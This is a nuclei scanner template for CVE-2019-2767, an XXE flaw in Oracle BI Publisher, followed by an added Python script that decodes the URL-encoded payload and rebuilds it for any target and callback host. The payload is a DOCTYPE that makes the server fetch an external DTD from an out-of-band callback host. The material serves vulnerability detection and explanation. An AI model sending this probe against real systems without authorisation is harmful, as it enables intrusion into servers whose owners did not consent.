24 lines
1020 B
YAML
id: CVE-2019-2767

info:
  name: Oracle Business Intelligence - Publisher XXE
  author: madrobot
  severity: high
  description: Vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware. The supported versions that are affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. This easily exploitable vulnerability allows an unauthenticated attacker with network access via HTTP to compromise BI Publisher (formerly XML Publisher). The template submits a DOCTYPE to /xmlpserver/convert whose parameter entity loads an external DTD from the interactsh host; an out-of-band HTTP interaction confirms that the XML parser resolves external entities.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2019-2767
    - https://www.exploit-db.com/exploits/46729
  tags: cve,cve2019,oracle,xxe,oob

requests:
  - raw:
      - |
        GET /xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+"http%3a//{{interactsh-url}}/xxe.xml">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
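The `xml` query parameter above is URL-encoded, which hides what the parser actually receives: a DOCTYPE that declares a parameter entity `%sp` pointing at `http://<callback>/xxe.xml`, then expands it (fetching the remote DTD) and expands `%param1;`, which is expected to be defined by that remote DTD. The template's matcher only needs the first fetch to happen, so it fires on any HTTP interaction regardless of what `xxe.xml` contains. The following Python is an added example, not part of the nuclei template or of nuclei itself: it decodes the template's exact request line to show the raw payload, rebuilds the same probe for an arbitrary target and callback host, and mirrors the `interactsh_protocol` word matcher. The hostnames `bi.example` and `oob.example` are placeholders assumed for illustration; the `TEMPLATE_REQUEST_LINE` string is copied from the template.

```python
"""Decode and rebuild the CVE-2019-2767 OOB XXE probe from the nuclei template.

Added example; not part of the template or of nuclei. Hostnames used in the
usage section are assumptions (placeholders), not real targets.
"""
from urllib.parse import parse_qs, quote_plus

# Copied verbatim from the template's raw request block.
TEMPLATE_REQUEST_LINE = (
    'GET /xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+r+'
    '[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+"http%3a//{{interactsh-url}}'
    '/xxe.xml">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1'
)


def build_payload(callback_host: str) -> str:
    """Decoded XML the template sends: a DTD whose parameter entity `%sp`
    points at a remote DTD on the callback host. Expanding `%sp;` forces the
    fetch; `%param1;` is whatever that remote DTD defines (not on the page)."""
    return (
        '<?xml version="1.0" ?>'
        '<!DOCTYPE r [<!ELEMENT r ANY >'
        f'<!ENTITY % sp SYSTEM "http://{callback_host}/xxe.xml">'
        '%sp;%param1;]>'
    )


def build_request(hostname: str, callback_host: str) -> str:
    """Raw HTTP/1.1 request equivalent to the template's `raw` block.
    Spaces become '+', and '%', '?', '=', ':', ';' are percent-encoded; the
    markup characters are left literal, as in the template."""
    encoded = quote_plus(build_payload(callback_host), safe='<>!"[]/')
    return (
        f"GET /xmlpserver/convert?xml={encoded}&_xf=Excel&_xl=123&template=123 HTTP/1.1\r\n"
        f"Host: {hostname}\r\n"
        "\r\n"
    )


def decode_probe(request_line: str) -> str:
    """Extract and URL-decode the `xml` parameter from a GET request line."""
    target = request_line.split(" ")[1]          # "/xmlpserver/convert?xml=..."
    query = target.split("?", 1)[1]              # first '?' starts the query
    return parse_qs(query)["xml"][0]             # parse_qs undoes '+' and %XX


def matched(interaction_protocols: list[str]) -> bool:
    """Mirror the template's matcher: type word, part interactsh_protocol,
    words ["http"]. Any recorded interaction whose protocol contains 'http'
    (i.e. the parser fetched xxe.xml) counts as a hit."""
    return any("http" in proto for proto in interaction_protocols)


if __name__ == "__main__":
    # Show the payload the target parser really sees.
    print(decode_probe(TEMPLATE_REQUEST_LINE))
    # Rebuild the probe for placeholder hosts (assumed names, not real targets).
    print(build_request("bi.example", "oob.example"))
    # Constructed interactsh protocol lists standing in for a real session.
    print("vulnerable:", matched(["http"]), "| no callback:", matched(["dns"]))
```

Decoding the template's own line and rebuilding the probe produce the same XML, so the only moving part is the callback host. Because the match condition is "the parser made an HTTP request", a hit proves external-entity resolution but says nothing about data exfiltration; that depends on what the remote `xxe.xml` defines, which the template leaves to the operator.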